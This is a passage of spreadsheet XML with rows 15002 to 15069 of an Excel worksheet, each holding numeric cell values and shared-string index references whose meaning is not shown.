      <c r="C15002" s="2" t="s">
        <v>14464</v>
      </c>
      <c r="D15002" s="2">
        <v>1.0</v>
      </c>
      <c r="E15002" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15002" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15003" ht="15.75" customHeight="1">
      <c r="A15003" s="1">
        <v>11937.0</v>
      </c>
      <c r="B15003" s="2">
        <v>2.550052E7</v>
      </c>
      <c r="C15003" s="2" t="s">
        <v>14465</v>
      </c>
      <c r="D15003" s="2">
        <v>1.0</v>
      </c>
      <c r="E15003" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15003" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15004" ht="15.75" customHeight="1">
      <c r="A15004" s="1">
        <v>15425.0</v>
      </c>
      <c r="B15004" s="2">
        <v>4.289225E7</v>
      </c>
      <c r="C15004" s="2" t="s">
        <v>14466</v>
      </c>
      <c r="D15004" s="2">
        <v>1.0</v>
      </c>
      <c r="E15004" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15004" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15005" ht="15.75" customHeight="1">
      <c r="A15005" s="1">
        <v>16968.0</v>
      </c>
      <c r="B15005" s="2">
        <v>4.8281434E7</v>
      </c>
      <c r="C15005" s="2" t="s">
        <v>14467</v>
      </c>
      <c r="D15005" s="2">
        <v>1.0</v>
      </c>
      <c r="E15005" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15005" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15006" ht="15.75" customHeight="1">
      <c r="A15006" s="1">
        <v>18759.0</v>
      </c>
      <c r="B15006" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C15006" s="2" t="s">
        <v>14468</v>
      </c>
      <c r="D15006" s="2">
        <v>1.0</v>
      </c>
      <c r="E15006" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15006" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15007" ht="15.75" customHeight="1">
      <c r="A15007" s="1">
        <v>22080.0</v>
      </c>
      <c r="B15007" s="2">
        <v>3.069875E7</v>
      </c>
      <c r="C15007" s="2" t="s">
        <v>14469</v>
      </c>
      <c r="D15007" s="2">
        <v>1.0</v>
      </c>
      <c r="E15007" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15007" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15008" ht="15.75" customHeight="1">
      <c r="A15008" s="1">
        <v>28524.0</v>
      </c>
      <c r="B15008" s="2">
        <v>2.6756545E7</v>
      </c>
      <c r="C15008" s="2" t="s">
        <v>14470</v>
      </c>
      <c r="D15008" s="2">
        <v>1.0</v>
      </c>
      <c r="E15008" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15008" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15009" ht="15.75" customHeight="1">
      <c r="A15009" s="1">
        <v>28649.0</v>
      </c>
      <c r="B15009" s="2">
        <v>2.7333326E7</v>
      </c>
      <c r="C15009" s="2" t="s">
        <v>14471</v>
      </c>
      <c r="D15009" s="2">
        <v>1.0</v>
      </c>
      <c r="E15009" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15009" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15010" ht="15.75" customHeight="1">
      <c r="A15010" s="1">
        <v>32138.0</v>
      </c>
      <c r="B15010" s="2">
        <v>5418445.0</v>
      </c>
      <c r="C15010" s="2" t="s">
        <v>14472</v>
      </c>
      <c r="D15010" s="2">
        <v>1.0</v>
      </c>
      <c r="E15010" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15010" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="15011" ht="15.75" customHeight="1">
      <c r="A15011" s="1">
        <v>24.0</v>
      </c>
      <c r="B15011" s="2">
        <v>1.0472856E7</v>
      </c>
      <c r="C15011" s="2" t="s">
        <v>14473</v>
      </c>
      <c r="D15011" s="2">
        <v>1.0</v>
      </c>
      <c r="E15011" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15011" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15012" ht="15.75" customHeight="1">
      <c r="A15012" s="1">
        <v>147.0</v>
      </c>
      <c r="B15012" s="2">
        <v>1.3592493E7</v>
      </c>
      <c r="C15012" s="2" t="s">
        <v>14474</v>
      </c>
      <c r="D15012" s="2">
        <v>1.0</v>
      </c>
      <c r="E15012" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15012" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15013" ht="15.75" customHeight="1">
      <c r="A15013" s="1">
        <v>275.0</v>
      </c>
      <c r="B15013" s="2">
        <v>1.5310621E7</v>
      </c>
      <c r="C15013" s="2" t="s">
        <v>14475</v>
      </c>
      <c r="D15013" s="2">
        <v>1.0</v>
      </c>
      <c r="E15013" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15013" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15014" ht="15.75" customHeight="1">
      <c r="A15014" s="1">
        <v>466.0</v>
      </c>
      <c r="B15014" s="2">
        <v>1.7335592E7</v>
      </c>
      <c r="C15014" s="2" t="s">
        <v>14476</v>
      </c>
      <c r="D15014" s="2">
        <v>1.0</v>
      </c>
      <c r="E15014" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15014" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15015" ht="15.75" customHeight="1">
      <c r="A15015" s="1">
        <v>571.0</v>
      </c>
      <c r="B15015" s="2">
        <v>1.9081698E7</v>
      </c>
      <c r="C15015" s="2" t="s">
        <v>14477</v>
      </c>
      <c r="D15015" s="2">
        <v>1.0</v>
      </c>
      <c r="E15015" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15015" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15016" ht="15.75" customHeight="1">
      <c r="A15016" s="1">
        <v>924.0</v>
      </c>
      <c r="B15016" s="2">
        <v>2.2308213E7</v>
      </c>
      <c r="C15016" s="2" t="s">
        <v>14478</v>
      </c>
      <c r="D15016" s="2">
        <v>1.0</v>
      </c>
      <c r="E15016" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15016" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15017" ht="15.75" customHeight="1">
      <c r="A15017" s="1">
        <v>1239.0</v>
      </c>
      <c r="B15017" s="2">
        <v>2.5084907E7</v>
      </c>
      <c r="C15017" s="2" t="s">
        <v>14479</v>
      </c>
      <c r="D15017" s="2">
        <v>1.0</v>
      </c>
      <c r="E15017" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15017" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15018" ht="15.75" customHeight="1">
      <c r="A15018" s="1">
        <v>1309.0</v>
      </c>
      <c r="B15018" s="2">
        <v>2.5696605E7</v>
      </c>
      <c r="C15018" s="2" t="s">
        <v>14480</v>
      </c>
      <c r="D15018" s="2">
        <v>1.0</v>
      </c>
      <c r="E15018" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15018" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15019" ht="15.75" customHeight="1">
      <c r="A15019" s="1">
        <v>1530.0</v>
      </c>
      <c r="B15019" s="2">
        <v>2.7439367E7</v>
      </c>
      <c r="C15019" s="2" t="s">
        <v>14481</v>
      </c>
      <c r="D15019" s="2">
        <v>1.0</v>
      </c>
      <c r="E15019" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15019" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15020" ht="15.75" customHeight="1">
      <c r="A15020" s="1">
        <v>2471.0</v>
      </c>
      <c r="B15020" s="2">
        <v>3.3834547E7</v>
      </c>
      <c r="C15020" s="2" t="s">
        <v>14482</v>
      </c>
      <c r="D15020" s="2">
        <v>1.0</v>
      </c>
      <c r="E15020" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15020" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15021" ht="15.75" customHeight="1">
      <c r="A15021" s="1">
        <v>2473.0</v>
      </c>
      <c r="B15021" s="2">
        <v>3.3843613E7</v>
      </c>
      <c r="C15021" s="2" t="s">
        <v>14483</v>
      </c>
      <c r="D15021" s="2">
        <v>1.0</v>
      </c>
      <c r="E15021" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15021" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15022" ht="15.75" customHeight="1">
      <c r="A15022" s="1">
        <v>2572.0</v>
      </c>
      <c r="B15022" s="2">
        <v>3.424419E7</v>
      </c>
      <c r="C15022" s="2" t="s">
        <v>14484</v>
      </c>
      <c r="D15022" s="2">
        <v>1.0</v>
      </c>
      <c r="E15022" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15022" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15023" ht="15.75" customHeight="1">
      <c r="A15023" s="1">
        <v>2588.0</v>
      </c>
      <c r="B15023" s="2">
        <v>3.4327323E7</v>
      </c>
      <c r="C15023" s="2" t="s">
        <v>14485</v>
      </c>
      <c r="D15023" s="2">
        <v>1.0</v>
      </c>
      <c r="E15023" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15023" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15024" ht="15.75" customHeight="1">
      <c r="A15024" s="1">
        <v>2589.0</v>
      </c>
      <c r="B15024" s="2">
        <v>3.4327323E7</v>
      </c>
      <c r="C15024" s="2" t="s">
        <v>14486</v>
      </c>
      <c r="D15024" s="2">
        <v>1.0</v>
      </c>
      <c r="E15024" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15024" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15025" ht="15.75" customHeight="1">
      <c r="A15025" s="1">
        <v>3460.0</v>
      </c>
      <c r="B15025" s="2">
        <v>3.8283998E7</v>
      </c>
      <c r="C15025" s="2" t="s">
        <v>14487</v>
      </c>
      <c r="D15025" s="2">
        <v>1.0</v>
      </c>
      <c r="E15025" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15025" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15026" ht="15.75" customHeight="1">
      <c r="A15026" s="1">
        <v>3480.0</v>
      </c>
      <c r="B15026" s="2">
        <v>3.8402642E7</v>
      </c>
      <c r="C15026" s="2" t="s">
        <v>14488</v>
      </c>
      <c r="D15026" s="2">
        <v>1.0</v>
      </c>
      <c r="E15026" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15026" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15027" ht="15.75" customHeight="1">
      <c r="A15027" s="1">
        <v>3913.0</v>
      </c>
      <c r="B15027" s="2">
        <v>4.0530606E7</v>
      </c>
      <c r="C15027" s="2" t="s">
        <v>14489</v>
      </c>
      <c r="D15027" s="2">
        <v>1.0</v>
      </c>
      <c r="E15027" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15027" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15028" ht="15.75" customHeight="1">
      <c r="A15028" s="1">
        <v>4295.0</v>
      </c>
      <c r="B15028" s="2">
        <v>4.1914689E7</v>
      </c>
      <c r="C15028" s="2" t="s">
        <v>14490</v>
      </c>
      <c r="D15028" s="2">
        <v>1.0</v>
      </c>
      <c r="E15028" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15028" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15029" ht="15.75" customHeight="1">
      <c r="A15029" s="1">
        <v>4584.0</v>
      </c>
      <c r="B15029" s="2">
        <v>4.2776955E7</v>
      </c>
      <c r="C15029" s="2" t="s">
        <v>14491</v>
      </c>
      <c r="D15029" s="2">
        <v>1.0</v>
      </c>
      <c r="E15029" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15029" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15030" ht="15.75" customHeight="1">
      <c r="A15030" s="1">
        <v>5045.0</v>
      </c>
      <c r="B15030" s="2">
        <v>4.4314757E7</v>
      </c>
      <c r="C15030" s="2" t="s">
        <v>14492</v>
      </c>
      <c r="D15030" s="2">
        <v>1.0</v>
      </c>
      <c r="E15030" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15030" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15031" ht="15.75" customHeight="1">
      <c r="A15031" s="1">
        <v>5123.0</v>
      </c>
      <c r="B15031" s="2">
        <v>4.4577224E7</v>
      </c>
      <c r="C15031" s="2" t="s">
        <v>14493</v>
      </c>
      <c r="D15031" s="2">
        <v>1.0</v>
      </c>
      <c r="E15031" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15031" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15032" ht="15.75" customHeight="1">
      <c r="A15032" s="1">
        <v>5321.0</v>
      </c>
      <c r="B15032" s="2">
        <v>4.5284878E7</v>
      </c>
      <c r="C15032" s="2" t="s">
        <v>14494</v>
      </c>
      <c r="D15032" s="2">
        <v>1.0</v>
      </c>
      <c r="E15032" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15032" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15033" ht="15.75" customHeight="1">
      <c r="A15033" s="1">
        <v>6126.0</v>
      </c>
      <c r="B15033" s="2">
        <v>4.7792922E7</v>
      </c>
      <c r="C15033" s="2" t="s">
        <v>14495</v>
      </c>
      <c r="D15033" s="2">
        <v>1.0</v>
      </c>
      <c r="E15033" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15033" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15034" ht="15.75" customHeight="1">
      <c r="A15034" s="1">
        <v>6315.0</v>
      </c>
      <c r="B15034" s="2">
        <v>4.8247004E7</v>
      </c>
      <c r="C15034" s="2" t="s">
        <v>14496</v>
      </c>
      <c r="D15034" s="2">
        <v>1.0</v>
      </c>
      <c r="E15034" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15034" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15035" ht="15.75" customHeight="1">
      <c r="A15035" s="1">
        <v>6818.0</v>
      </c>
      <c r="B15035" s="2">
        <v>4.9541194E7</v>
      </c>
      <c r="C15035" s="2" t="s">
        <v>14497</v>
      </c>
      <c r="D15035" s="2">
        <v>1.0</v>
      </c>
      <c r="E15035" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15035" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15036" ht="15.75" customHeight="1">
      <c r="A15036" s="1">
        <v>7440.0</v>
      </c>
      <c r="B15036" s="2">
        <v>5.12178E7</v>
      </c>
      <c r="C15036" s="2" t="s">
        <v>14498</v>
      </c>
      <c r="D15036" s="2">
        <v>1.0</v>
      </c>
      <c r="E15036" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15036" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15037" ht="15.75" customHeight="1">
      <c r="A15037" s="1">
        <v>8379.0</v>
      </c>
      <c r="B15037" s="2">
        <v>5.3813603E7</v>
      </c>
      <c r="C15037" s="2" t="s">
        <v>14499</v>
      </c>
      <c r="D15037" s="2">
        <v>1.0</v>
      </c>
      <c r="E15037" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15037" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15038" ht="15.75" customHeight="1">
      <c r="A15038" s="1">
        <v>9018.0</v>
      </c>
      <c r="B15038" s="2">
        <v>5.5000121E7</v>
      </c>
      <c r="C15038" s="2" t="s">
        <v>14500</v>
      </c>
      <c r="D15038" s="2">
        <v>1.0</v>
      </c>
      <c r="E15038" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15038" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15039" ht="15.75" customHeight="1">
      <c r="A15039" s="1">
        <v>9413.0</v>
      </c>
      <c r="B15039" s="2">
        <v>5.5781656E7</v>
      </c>
      <c r="C15039" s="2" t="s">
        <v>14501</v>
      </c>
      <c r="D15039" s="2">
        <v>1.0</v>
      </c>
      <c r="E15039" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15039" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15040" ht="15.75" customHeight="1">
      <c r="A15040" s="1">
        <v>9450.0</v>
      </c>
      <c r="B15040" s="2">
        <v>5.5840501E7</v>
      </c>
      <c r="C15040" s="2" t="s">
        <v>14502</v>
      </c>
      <c r="D15040" s="2">
        <v>1.0</v>
      </c>
      <c r="E15040" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15040" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15041" ht="15.75" customHeight="1">
      <c r="A15041" s="1">
        <v>9530.0</v>
      </c>
      <c r="B15041" s="2">
        <v>5.5982911E7</v>
      </c>
      <c r="C15041" s="2" t="s">
        <v>14503</v>
      </c>
      <c r="D15041" s="2">
        <v>1.0</v>
      </c>
      <c r="E15041" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15041" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15042" ht="15.75" customHeight="1">
      <c r="A15042" s="1">
        <v>9665.0</v>
      </c>
      <c r="B15042" s="2">
        <v>5.6307237E7</v>
      </c>
      <c r="C15042" s="2" t="s">
        <v>14504</v>
      </c>
      <c r="D15042" s="2">
        <v>1.0</v>
      </c>
      <c r="E15042" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15042" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15043" ht="15.75" customHeight="1">
      <c r="A15043" s="1">
        <v>9848.0</v>
      </c>
      <c r="B15043" s="2">
        <v>5.6690817E7</v>
      </c>
      <c r="C15043" s="2" t="s">
        <v>14505</v>
      </c>
      <c r="D15043" s="2">
        <v>1.0</v>
      </c>
      <c r="E15043" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15043" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15044" ht="15.75" customHeight="1">
      <c r="A15044" s="1">
        <v>10232.0</v>
      </c>
      <c r="B15044" s="2">
        <v>5.7489773E7</v>
      </c>
      <c r="C15044" s="2" t="s">
        <v>14506</v>
      </c>
      <c r="D15044" s="2">
        <v>1.0</v>
      </c>
      <c r="E15044" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15044" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15045" ht="15.75" customHeight="1">
      <c r="A15045" s="1">
        <v>10302.0</v>
      </c>
      <c r="B15045" s="2">
        <v>5.7667674E7</v>
      </c>
      <c r="C15045" s="2" t="s">
        <v>14507</v>
      </c>
      <c r="D15045" s="2">
        <v>1.0</v>
      </c>
      <c r="E15045" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15045" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15046" ht="15.75" customHeight="1">
      <c r="A15046" s="1">
        <v>10466.0</v>
      </c>
      <c r="B15046" s="2">
        <v>1.0840022E7</v>
      </c>
      <c r="C15046" s="2" t="s">
        <v>14508</v>
      </c>
      <c r="D15046" s="2">
        <v>1.0</v>
      </c>
      <c r="E15046" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15046" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15047" ht="15.75" customHeight="1">
      <c r="A15047" s="1">
        <v>10527.0</v>
      </c>
      <c r="B15047" s="2">
        <v>1.2137855E7</v>
      </c>
      <c r="C15047" s="2" t="s">
        <v>14509</v>
      </c>
      <c r="D15047" s="2">
        <v>1.0</v>
      </c>
      <c r="E15047" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15047" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15048" ht="15.75" customHeight="1">
      <c r="A15048" s="1">
        <v>11475.0</v>
      </c>
      <c r="B15048" s="2">
        <v>2.1959077E7</v>
      </c>
      <c r="C15048" s="2" t="s">
        <v>14510</v>
      </c>
      <c r="D15048" s="2">
        <v>1.0</v>
      </c>
      <c r="E15048" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15048" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15049" ht="15.75" customHeight="1">
      <c r="A15049" s="1">
        <v>11700.0</v>
      </c>
      <c r="B15049" s="2">
        <v>2.3482255E7</v>
      </c>
      <c r="C15049" s="2" t="s">
        <v>14511</v>
      </c>
      <c r="D15049" s="2">
        <v>1.0</v>
      </c>
      <c r="E15049" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15049" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15050" ht="15.75" customHeight="1">
      <c r="A15050" s="1">
        <v>12209.0</v>
      </c>
      <c r="B15050" s="2">
        <v>2.7606624E7</v>
      </c>
      <c r="C15050" s="2" t="s">
        <v>14512</v>
      </c>
      <c r="D15050" s="2">
        <v>1.0</v>
      </c>
      <c r="E15050" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15050" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15051" ht="15.75" customHeight="1">
      <c r="A15051" s="1">
        <v>13232.0</v>
      </c>
      <c r="B15051" s="2">
        <v>3.4248348E7</v>
      </c>
      <c r="C15051" s="2" t="s">
        <v>14513</v>
      </c>
      <c r="D15051" s="2">
        <v>1.0</v>
      </c>
      <c r="E15051" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15051" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15052" ht="15.75" customHeight="1">
      <c r="A15052" s="1">
        <v>15697.0</v>
      </c>
      <c r="B15052" s="2">
        <v>4.3900767E7</v>
      </c>
      <c r="C15052" s="2" t="s">
        <v>14514</v>
      </c>
      <c r="D15052" s="2">
        <v>1.0</v>
      </c>
      <c r="E15052" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15052" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15053" ht="15.75" customHeight="1">
      <c r="A15053" s="1">
        <v>16285.0</v>
      </c>
      <c r="B15053" s="2">
        <v>4.5811334E7</v>
      </c>
      <c r="C15053" s="2" t="s">
        <v>14515</v>
      </c>
      <c r="D15053" s="2">
        <v>1.0</v>
      </c>
      <c r="E15053" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15053" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15054" ht="15.75" customHeight="1">
      <c r="A15054" s="1">
        <v>17295.0</v>
      </c>
      <c r="B15054" s="2">
        <v>4.9256502E7</v>
      </c>
      <c r="C15054" s="2" t="s">
        <v>14516</v>
      </c>
      <c r="D15054" s="2">
        <v>1.0</v>
      </c>
      <c r="E15054" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15054" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15055" ht="15.75" customHeight="1">
      <c r="A15055" s="1">
        <v>18441.0</v>
      </c>
      <c r="B15055" s="2">
        <v>5.2777446E7</v>
      </c>
      <c r="C15055" s="2" t="s">
        <v>14517</v>
      </c>
      <c r="D15055" s="2">
        <v>1.0</v>
      </c>
      <c r="E15055" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15055" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15056" ht="15.75" customHeight="1">
      <c r="A15056" s="1">
        <v>18580.0</v>
      </c>
      <c r="B15056" s="2">
        <v>5.3243216E7</v>
      </c>
      <c r="C15056" s="2" t="s">
        <v>14518</v>
      </c>
      <c r="D15056" s="2">
        <v>1.0</v>
      </c>
      <c r="E15056" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15056" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15057" ht="15.75" customHeight="1">
      <c r="A15057" s="1">
        <v>19707.0</v>
      </c>
      <c r="B15057" s="2">
        <v>5.6535479E7</v>
      </c>
      <c r="C15057" s="2" t="s">
        <v>14519</v>
      </c>
      <c r="D15057" s="2">
        <v>1.0</v>
      </c>
      <c r="E15057" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15057" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15058" ht="15.75" customHeight="1">
      <c r="A15058" s="1">
        <v>20092.0</v>
      </c>
      <c r="B15058" s="2">
        <v>9519817.0</v>
      </c>
      <c r="C15058" s="2" t="s">
        <v>14520</v>
      </c>
      <c r="D15058" s="2">
        <v>1.0</v>
      </c>
      <c r="E15058" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15058" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15059" ht="15.75" customHeight="1">
      <c r="A15059" s="1">
        <v>20750.0</v>
      </c>
      <c r="B15059" s="2">
        <v>1.4828358E7</v>
      </c>
      <c r="C15059" s="2" t="s">
        <v>14521</v>
      </c>
      <c r="D15059" s="2">
        <v>1.0</v>
      </c>
      <c r="E15059" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15059" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15060" ht="15.75" customHeight="1">
      <c r="A15060" s="1">
        <v>22449.0</v>
      </c>
      <c r="B15060" s="2">
        <v>3625152.0</v>
      </c>
      <c r="C15060" s="2" t="s">
        <v>14522</v>
      </c>
      <c r="D15060" s="2">
        <v>1.0</v>
      </c>
      <c r="E15060" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15060" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15061" ht="15.75" customHeight="1">
      <c r="A15061" s="1">
        <v>22921.0</v>
      </c>
      <c r="B15061" s="2">
        <v>4.8364668E7</v>
      </c>
      <c r="C15061" s="2" t="s">
        <v>14523</v>
      </c>
      <c r="D15061" s="2">
        <v>1.0</v>
      </c>
      <c r="E15061" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15061" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15062" ht="15.75" customHeight="1">
      <c r="A15062" s="1">
        <v>23266.0</v>
      </c>
      <c r="B15062" s="2">
        <v>5329042.0</v>
      </c>
      <c r="C15062" s="2" t="s">
        <v>14524</v>
      </c>
      <c r="D15062" s="2">
        <v>1.0</v>
      </c>
      <c r="E15062" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15062" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15063" ht="15.75" customHeight="1">
      <c r="A15063" s="1">
        <v>23769.0</v>
      </c>
      <c r="B15063" s="2">
        <v>7542304.0</v>
      </c>
      <c r="C15063" s="2" t="s">
        <v>14525</v>
      </c>
      <c r="D15063" s="2">
        <v>1.0</v>
      </c>
      <c r="E15063" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15063" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15064" ht="15.75" customHeight="1">
      <c r="A15064" s="1">
        <v>24221.0</v>
      </c>
      <c r="B15064" s="2">
        <v>1.0422571E7</v>
      </c>
      <c r="C15064" s="2" t="s">
        <v>14526</v>
      </c>
      <c r="D15064" s="2">
        <v>1.0</v>
      </c>
      <c r="E15064" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15064" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15065" ht="15.75" customHeight="1">
      <c r="A15065" s="1">
        <v>25347.0</v>
      </c>
      <c r="B15065" s="2">
        <v>1.3544863E7</v>
      </c>
      <c r="C15065" s="2" t="s">
        <v>14527</v>
      </c>
      <c r="D15065" s="2">
        <v>1.0</v>
      </c>
      <c r="E15065" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15065" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15066" ht="15.75" customHeight="1">
      <c r="A15066" s="1">
        <v>25610.0</v>
      </c>
      <c r="B15066" s="2">
        <v>1.440173E7</v>
      </c>
      <c r="C15066" s="2" t="s">
        <v>14528</v>
      </c>
      <c r="D15066" s="2">
        <v>1.0</v>
      </c>
      <c r="E15066" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15066" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15067" ht="15.75" customHeight="1">
      <c r="A15067" s="1">
        <v>26091.0</v>
      </c>
      <c r="B15067" s="2">
        <v>1.5677421E7</v>
      </c>
      <c r="C15067" s="2" t="s">
        <v>14529</v>
      </c>
      <c r="D15067" s="2">
        <v>1.0</v>
      </c>
      <c r="E15067" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15067" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15068" ht="15.75" customHeight="1">
      <c r="A15068" s="1">
        <v>26924.0</v>
      </c>
      <c r="B15068" s="2">
        <v>1.9427156E7</v>
      </c>
      <c r="C15068" s="2" t="s">
        <v>14522</v>
      </c>
      <c r="D15068" s="2">
        <v>1.0</v>
      </c>
      <c r="E15068" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15068" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="15069" ht="15.75" customHeight="1">
      <c r="A15069" s="1">
        <v>28331.0</v>
      </c>
      <c r="B15069" s="2">
        <v>2.5879564E7</v>
      </c>
